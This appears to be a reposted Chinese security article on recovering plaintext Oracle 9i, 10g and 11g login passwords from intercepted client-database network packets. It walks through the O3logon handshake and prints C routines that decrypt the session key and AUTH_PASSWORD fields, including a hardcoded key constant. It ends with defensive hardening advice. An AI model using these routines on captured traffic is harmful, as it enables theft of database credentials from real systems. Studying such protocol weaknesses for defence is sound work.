见招拆招:破解Oracle数据库密码
ccwgpt 2024-11-26 01:08 25 浏览 0 评论
一.概要
本文主要目的,希望通过分享解密方法引起相关人士对网络安全的重视。数据库安全绝不单只数据库本身的安全,和数据库所处的整个环境都有密切关系。
本文所说的破解oracle9i、oracle10g、oracle11g密码,特指通过对oracle数据库和客户端之间通讯包进行处理破解出oracle密码明文,这有别于对oracle数据库中存储的16位密码进行破解。截获网络信息往往比登入数据库找到密码密文更易操作、更难防范、隐秘性更高。
本文会说明oracle最常见的3个版本的具体算法,但是不会揭露算法内部细节。
二.背景
随着信息通讯的发展,网络变得越来越复杂,同时也越来越不安全。如下图所示:从客户端到数据库的过程中,攻击者有越来越多的攻击目标选择。无论在哪一环节成功对网络进行拦截或者监听都会获得oracle数据库和客户端之间的通讯包。如果通讯包中恰好含有用户信息,如果不进行加密处理这将是灾难性的事件。本文依oracle的3个版本为例(9i 10g11g)。分别说明核心通讯内容加密的方法和发展趋势。
三.oracle加密原理
当Oracle发起接后,Oracle客户端向oracle数据库发送自己版本号,包含的加密算法等信息。最终2边确定使用什么加密算法。然后进行O3logon验证。O3logon验证是一种查询-响应协议,他利用DES加密技术保护这个会话的密钥(sesskey),保证sesskey不会在网络中传输,所以即使有人监听网络也不会暴露核心密钥。其中O3logon验证的核心是sesskey。
首先服务器通过oracle_hash(不同的版本不一样,在9i中是用户名+密码,再进行sha1运算)和sesskey(一个随机数)算出服务器端的S_auth_sesskey.
客户端拿到服务器的S_auth_sesskey后通过手上的散列值(这个散列值是用与服务器端一样的方法计算的orcale_hash)算出数据库所选择的随机sesskey。
客户端使用sesskey 生成新的散列值,以该值为密钥与明文password进行运算得到秘文password; 然后将秘文password发送到服务器端。
服务器端收到password;通过sesskey生成散列值密钥,对秘文password进行解密得到密码明文,如果与库中存储一致则登陆成功。(参见下图)
四.实例
上面主要是原理的说明,下面就3个版本的数据库进行分别说明(他们既有相同,也有不同的地方)。
oracle9i:
本文默认你已经通过某些方式取得了一个含有Oracle登录信息的网络通讯包。省略掉前面和破密关系不大的信息在数据包中寻找到3个相关信息分别是数据库发送给客户端的AUTH_SESSKEY 、用户名明文和AUTH_PASSWORD。
客户端在得到auth_sesskey后,客户端运算出oracle_hash ,首先对orcale_hash做SHA1运算会得到服务器端的散列值。以服务器端散列值为密钥进行3DES解密,可以把服务器端发给客户端的AUTH_SESSKEY转化成本次回话的sesskey。
服务器端在得到auth_password后,把sesskey按照一定的方法做SHA1运算得到客户端散列值。客户端散列值和AUTH_PASSWORD通过3DES可以算出存于数据库中的密码密文。最后客户端散列值和密码密文进行运算可以还原回密码明文。
由于9i是采用把用户名明文和密码明文按照顺序排列在一起对整个字符串做处理生成oracle_hash。由于添加的参数是固定的所以即使不是同一台数据库只要加入的账号+密码相同则,他们的sesskey是相同的。例如用户名aabbcc密码ccddee和用户名aabbcccc密码ddee是一样的sesskey。
参考代码
intORACLE_Hash(char*username,char*passwd,intpasswd_len,unsignedchar*oracle_hash){charToEncrypt[256];chartemp[256];DES_cblockiv,iv2;DES_key_scheduleks1,ks2;intlen=0;intj,ulen,plen;memset(ToEncrypt,0,sizeof(ToEncrypt));strupr(username);strupr(passwd);ulen=strlen(username);plen=passwd_len;for(len=1,j=0;j<ulen;len++,j++){ToEncrypt[len]=username[j];len++;}for(j=0;j<plen;len++,j++){ToEncrypt[len]=passwd[j];len++;}len=len-1;memset(iv,0,8);memset(iv2,0,8);DES_set_key((DES_cblock*)deskey_fixed,&ks1);DES_ncbc_encrypt((unsignedchar*)ToEncrypt,(unsignedchar*)temp,len,&ks1,&iv,DES_ENCRYPT);DES_set_key((DES_cblock*)&iv,&ks2);DES_ncbc_encrypt((unsignedchar*)ToEncrypt,(unsignedchar*)temp,len,&ks2,&iv2,DES_ENCRYPT);memcpy(oracle_hash,iv2,8)returnTRUE;}
注:以上的代码并未使用sha1,而是采用了des,与前文介绍不一致。而且其中deskey_fixed是什么?是下文的fixed31吗?
intORACLE_TNS_Decrypt_Password_9i(unsignedcharOracleHash[8],unsignedcharauth_sesskey[16],unsignedcharauth_password[16],char*decrypted){unsignedcharfixed31[]={0xA2,0xFB,0xE6,0xAD,0x4C,0x7D,0x1E,0x3D,0x6E,0xB0,0xB7,0x6C,0x97,0xEF,0xFF,0x84,0x44,0x71,0x02,0x84,0xAC,0xF1,0x3B,0x29,0x5C,0x0F,0x0C,0xB1,0x87,0x75,0xEF};unsignedchartriple_des_key[64];unsignedcharsesskey[16];unsignedcharobfuscated[16];intPassLen=16;ORACLE_TNS_Create_Key_SHA1(OracleHash,8,fixed31,sizeof(fixed31),24,triple_des_key);ORACLE_TNS_Decrypt_3DES_CBC(auth_sesskey,16,triple_des_key,sesskey);ORACLE_TNS_Create_Key_SHA1(sesskey,16,NULL,0,40,triple_des_key);ORACLE_TNS_Decrypt_3DES_CBC(auth_password,16,triple_des_key,obfuscated);ORACLE_TNS_DeObfuscate(triple_des_key,obfuscated,&PassLen);memcpy(decrypted,obfuscated,PassLen);returnPassLen;}
oracle10g
10g在9i的基础上进行了很大的改变。同样还是假设我们已经取得一个含有Oracle登录信息的网络通讯包。省略掉前面和破密关系不大的信息在数据包中寻找到4个相关信息分别是数据库发送给客户端的S_AUTH_SESSKEY、用户名明文、客户端发送给服务器的C_AUTH_SESSKEY和AUTH_PASSWORD。
首先假设取得了oracle_hash,这里不同于9i。9i虽然算了2个不同的散列值。但由于2个散列值都是通过固定数据和oracle_hash算出来的,所以难免被破解,而且效率不高。从Oracle10g开始,Oracle调整了策略,客户端和数据库分别以oracle_hash为基础生成S_AUTH_SESSKEY和C_AUTH_SESSKEY。
客户端对传过来的S_AUTH_SESSKEY。做AES128解密处理拿到server_sesskey。把server_sesskey和自己的client_sesskey做md5生成combine。用combine生成AUTH_PASSWORD。
服务器端最后用combine对AUTH_PASSWORD解密。对比密码,如果一致登陆成功。
10g在对于sesskey的处理上取得了长足的改善,但是对oracle_hash的产生上依旧延续了9i的方式。采用用户名和密码进行拼接组成最关键的字符串。对该字符串进行DES处理。
参考代码
intORACLE_TNS_Decrypt_Password_10g(unsignedcharOracleHash[8],unsignedcharauth_sesskey[32],unsignedcharauth_sesskey_cli[32],unsignedchar*auth_password,intauth_password_len,char*decrypted){intpasslen=0;unsignedcharaes_key_bytes[32];unsignedchardecrypted_server_sesskey[32];unsignedchardecrypted_client_sesskey[32];unsignedcharcombined_sesskeys[16];chardecrypted_password[64];memset(aes_key_bytes,0,sizeof(aes_key_bytes));memcpy(aes_key_bytes,OracleHash,8);ORACLE_TNS_Decrypt_AES128_CBC(aes_key_bytes,auth_sesskey,32,decrypted_server_sesskey);ORACLE_TNS_Decrypt_AES128_CBC(aes_key_bytes,auth_sesskey_cli,32,decrypted_client_sesskey);ORACLE_TNS_Combine_SessKeys(&decrypted_server_sesskey[16],&decrypted_client_sesskey[16],combined_sesskeys);ORACLE_TNS_Decrypt_AES128_CBC(combined_sesskeys,auth_password,auth_password_len,(unsignedchar*)decrypted_password);passlen=terminate_ascii_string(&decrypted_password[16],auth_password_len-16);if(passlen!=-1)strncpy(decrypted,&decrypted_password[16],passlen);returnpasslen;}
oracle11g
11g在10g的基础上进行了一定的改变。同样还是假设我们已经取得一个含有Oracle登录信息的网络通讯包。省略掉前面和破密关系不大的信息在数据包中寻找到4个相关信息分别是数据库发送给客户端的S_AUTH_SESSKEY、AUTH_VFR_DATA、客户端发送给服务器的C_AUTH_SESSKEY和AUTH_PASSWORD。
依旧假设取得了Oracle_hash,11g基本同于10g,客户端和数据库分别以Oracle_hash为基础生成S_AUTH_SESSKEY和C_AUTH_SESSKEY。客户端对传过来的S_AUTH_SESSKEY。做AES192解密处理拿到server_sesskey。把server_sesskey和自己的client_sesskey做md5生成combine。用combine生成AUTH_PASSWORD。服务器端最后用combine对AUTH_PASSWORD解密。对比密码,如果一致登陆成功。
11g最大的变化在生成Oracle_hash上采取了和10g不同的策略。Oracle 11g为了提高Oracle_hash的安全性,多引入了AUTH_VFR_DATA这个随机值。取消了明文用户名。每个会话的AUTH_VFR_DATA都不同。从根本上避免9i、10g同字符串(用户名+密码组成的字符串)带来的无论哪台机器oracle_hash一致的巨大安全隐患。
参考代码
voidORACLE_MixCase_Hash(char*passwd,intpasswd_len,unsignedcharsalt[10],unsignedchar*oracle_mixcase_hash){unsignedcharto_hash[256];memcpy(to_hash,passwd,passwd_len);memcpy(to_hash+passwd_len,salt,10);SHA_CTXctx;SHA1_Init(&ctx);SHA1_Update(&ctx,to_hash,passwd_len+10);SHA1_Final(oracle_mixcase_hash,&ctx);}
五.总结
从Oracle9i到Oracle11g的变化,我们可以清晰得看出oracle调整的思路,就是更安全。从11g开始,oracle和密码相关登陆信息全部采用了密文。有效地加大了破解难度。我们身为IT软件从业者和安全行业从业者,应该向Oracle学习,不单单重视软件本身的安全,同时也要对环境有一定的抵抗力。一定注意防止网络监听,设计SID的时候尽量避免ORCL、TEST等常用名。端口号尽量不要选用1521 和1523来增加扫描难度。使用复杂密码,定期更换密码等都会有助于oracle的安全
(本文摘自:freebuf)
相关推荐
- 一个基于.Net Core遵循Clean Architecture原则开源架构
-
今天给大家推荐一个遵循CleanArchitecture原则开源架构。项目简介这是基于Asp.netCore6开发的,遵循CleanArchitecture原则,可以高效、快速地构建基于Ra...
- AI写代码翻车无数次,我发现只要提前做好这3步,bug立减80%
-
写十万行全是bug之后终于找到方法了开发"提示词管理助手"新版本那会儿,我差点被bug整崩溃。刚开始两周,全靠AI改代码架构,结果十万行程序漏洞百出。本来以为AI说没问题就稳了,结果...
- OneCode低代码平台的事件驱动设计:架构解析与实践
-
引言:低代码平台的事件驱动范式在现代软件开发中,事件驱动架构(EDA)已成为构建灵活、松耦合系统的核心范式。OneCode低代码平台通过创新性的注解驱动设计,将事件驱动理念深度融入平台架构,实现了业务...
- 国内大厂AI插件评测:根据UI图生成Vue前端代码
-
在IDEA中安装大厂的AI插件,打开ruoyi增强项目:yudao-ui-admin-vue31.CodeBuddy插件登录腾讯的CodeBuddy后,大模型选择deepseek-v3,输入提示语:...
- AI+低代码技术揭秘(二):核心架构
-
本文档介绍了为VTJ低代码平台提供支持的基本架构组件,包括Engine编排层、Provider服务系统、数据模型和代码生成管道。有关UI组件库和widget系统的信息,请参阅UI...
- GitDiagram用AI把代码库变成可视化架构图
-
这是一个名为gitdiagram的开源工具,可将GitHub仓库实时转换为交互式架构图,帮助开发者快速理解代码结构。核心功能一键可视化:替换GitHubURL中的"hub...
- 30天自制操作系统:第六天:代码架构整理与中断处理
-
1.拆开bootpack.c文件。根据设计模式将对应的功能封装成独立的文件。2.初始化pic:pic(可编程中断控制器):在设计上,cpu单独只能处理一个中断。而pic是将8个中断信号集合成一个中断...
- AI写代码越帮越忙?2025年研究揭露惊人真相
-
近年来,AI工具如雨后春笋般涌现,许多人开始幻想程序员的未来就是“对着AI说几句话”,就能轻松写出完美的代码。然而,2025年的一项最新研究却颠覆了这一期待,揭示了一个令人意外的结果。研究邀请了16位...
- 一键理解开源项目:两个自动生成GitHub代码架构图与说明书工具
-
一、GitDiagram可以一键生成github代码仓库的架构图如果想要可视化github开源项目:https://github.com/luler/reflex_ai_fast,也可以直接把域名替换...
- 5分钟掌握 c# 网络通讯架构及代码示例
-
以下是C#网络通讯架构的核心要点及代码示例,按协议类型分类整理:一、TCP协议(可靠连接)1.同步通信//服务器端usingSystem.Net.Sockets;usingTcpListene...
- 从复杂到优雅:用建造者和责任链重塑代码架构
-
引用设计模式是软件开发中的重要工具,它为解决常见问题提供了标准化的解决方案,提高了代码的可维护性和可扩展性,提升了开发效率,促进了团队协作,提高了软件质量,并帮助开发者更好地适应需求变化。通过学习和应...
- 低代码开发当道,我还需要学习LangChain这些框架吗?| IT杂谈
-
专注LLM深度应用,关注我不迷路前两天有位兄弟问了个问题:当然我很能理解这位朋友的担忧:期望效率最大化,时间用在刀刃上,“不要重新发明轮子”嘛。铺天盖地的AI信息轰炸与概念炒作,很容易让人浮躁与迷茫。...
- 框架设计并不是简单粗暴地写代码,而是要先弄清逻辑
-
3.框架设计3.框架设计本节我们要开发一个UI框架,底层以白鹭引擎为例。框架设计的第一步并不是直接撸代码,而是先想清楚设计思想,抽象。一个一个的UI窗口是独立的吗?不是的,...
- 大佬用 Avalonia 框架开发的 C# 代码 IDE
-
AvalonStudioAvalonStudio是一个开源的跨平台的开发编辑器(IDE),AvalonStudio的目标是成为一个功能齐全,并且可以让开发者快速使用的IDE,提高开发的生产力。A...
- 轻量级框架Lagent 仅需20行代码即可构建自己的智能代理
-
站长之家(ChinaZ.com)8月30日消息:Lagent是一个专注于基于LLM模型的代理开发的轻量级框架。它的设计旨在简化和提高这种模型下代理的开发效率。LLM模型是一种强大的工具,可以...
你 发表评论:
欢迎- 一周热门
- 最近发表
- 标签列表
-
- 框架图 (58)
- flask框架 (53)
- quartz框架 (51)
- abp框架 (47)
- springmvc框架 (49)
- 分布式事务框架 (65)
- scrapy框架 (56)
- shiro框架 (61)
- 定时任务框架 (56)
- java日志框架 (61)
- mfc框架 (52)
- abb框架断路器 (48)
- beego框架 (52)
- java框架spring (58)
- grpc框架 (65)
- tornado框架 (48)
- 前端框架bootstrap (54)
- orm框架有哪些 (51)
- 知识框架图 (52)
- ppt框架 (55)
- 框架图模板 (59)
- 内联框架 (52)
- cad怎么画框架 (58)
- ssm框架实现登录注册 (49)
- oracle字符串长度 (48)